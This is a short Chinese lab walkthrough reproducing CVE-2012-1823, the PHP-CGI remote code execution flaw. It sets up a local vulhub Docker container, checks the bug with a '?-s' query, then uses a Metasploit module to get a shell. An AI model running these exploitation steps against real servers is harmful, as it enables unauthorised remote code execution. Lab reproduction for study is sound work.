CVE-2012-1823漏洞复现

进入下面目录/home/kali/vulhub/php/CVE-2012-1823

启动docker

bash 复制代码
sudo docker-compose up -d

可以看到已经启动了。

在浏览器输入http://127.0.0.1:8080/

可以看到正常启动了。在浏览器输入http://127.0.0.1:8080/?-s

说明是有漏洞的。

在控制台输入msfconsole,等一会。

输入search php cgi

注意看第24条exploit/multi/http/php_cgi_arg_injection。执行

bash 复制代码
use exploit/multi/http/php_cgi_arg_injection

设置rhost , rport ,查看options

运行run

进入shell,可以使用ls cd pwd whoami等命令。

参考

PHP-CGI远程代码执行漏洞(CVE-2012-1823)漏洞复现 - Junglezt - 博客园

相关推荐
磐时信息技术1 小时前
SASETalk | 当智能驾驶驶入未知场景:谈谈关于SOTIF、AI安全与工程落地的思考
人工智能·安全·预期功能安全·sotif
Chengbei112 小时前
SRC报告成稿 Skill(SRC/0day 提交稿、分层验证门、Step 式 PoC、截图铁律)
网络·人工智能·安全·web安全·自动化·系统安全
2601_966377132 小时前
云上系统零改造过密评|数达安全发布通关四件套
网络·安全
每天题库3 小时前
交安C证报考条件有哪些?公路水运安全员C证报名时间及考试科目
学习·安全·考试·题库·考证
sbjdhjd3 小时前
PHP eval 型 RCE:flag 正则过滤与通配符绕过实操 | 01
安全·web安全·网络安全·开源·系统安全·php·网络攻击模型
科技小登3 小时前
重大活动安全保障方案怎么选?重保服务、攻防演练、应急响应与安全意识培训实战与边界
数据库·人工智能·安全
数据知道4 小时前
静态分析入门——PE 结构、字符串、导入表快速定性
网络·安全·web安全·网络安全
黄乐荣4 小时前
系统分析师-2025-11
安全
算法大模型备案干货咪6 小时前
《把内容安全做成CI卡点:AIGC合规的工程化落地》
安全·ci/cd·aigc
赫媒派6 小时前
OpenAI Recurrent Depth:3个安全隐患
安全·openai·ai编程